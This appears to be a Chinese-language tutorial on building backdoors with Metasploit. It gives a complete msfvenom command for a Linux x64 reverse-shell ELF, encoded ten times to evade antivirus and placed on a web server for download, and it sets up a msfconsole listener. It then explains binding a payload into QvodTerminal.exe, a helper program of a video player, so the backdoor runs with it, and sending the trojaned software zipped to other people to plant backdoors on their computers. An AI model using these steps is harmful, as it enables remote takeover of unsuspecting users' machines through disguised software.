一.使用msf制作linux后门
二. 实战,给软件加后门
制作linux后门
1.使用msfvenom生成linux可执行文件
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b '\x00' -i 10 -f elf -o /var/www/html/xueguo
-a x64 指定架构 (x86代表32为,x64代表64位)
--platform linux 指定平台(linux)
-p payload 指定payload
LHOST 192.169.124.3 目标主机
LPORT 指定连接kali的端口
-b ‘’ 去除坏字符
-e x86/shikata_ga_nai msf自带的编译器(-e:指定编译器也就是所谓的免杀)
-i 10 指定编码次数(增大免杀的概率)
-f elf 指定输出格式(linux是elf文件,windows是exe文件)
-o /var/www/html/123 指定文件名称和导出位置,指定到/var/www/html方便肉机上下载后门程序
2.kali开启监听
(1)开启msfconsole
(小牛还挺可爱哈哈哈哈哈)
设定参数
handler 开启监听模式
set payload linux/x86/meterpreter/reverse_tcp 指定payload
set LPORT &&LHOST 指定端口和IP地址
(2)输入exploit开启监听
之后linux系统运行软件后就可以进行监听
实战.给软件加后门
给正常软件加后门的思路:先查看主程序会调用哪些附加的小程序,然后把payload后门和把这些小程序绑定在一起(如果绑到主程序上有时会报错)
当运行QvodPlayer.exe这个主程序时同时会运行QvodTerminal.exe这个附加程序
a.通过finalshell远程连接kali将QvodTerminal.exe传入
b.对QvodTerminal.exe注入后门程序
-x 表示要绑定木马的程序
c.利用绑定木马的QvodTerminal.exe代替原本的QvodTerminal.exe
在windows浏览器中访问http://192.168.124.3/QvodTerminal.exe下载该带有后门的程序并进行替换
然后将其压缩成压缩包发送给他人他人点击使用后就可以在其电脑上留下后门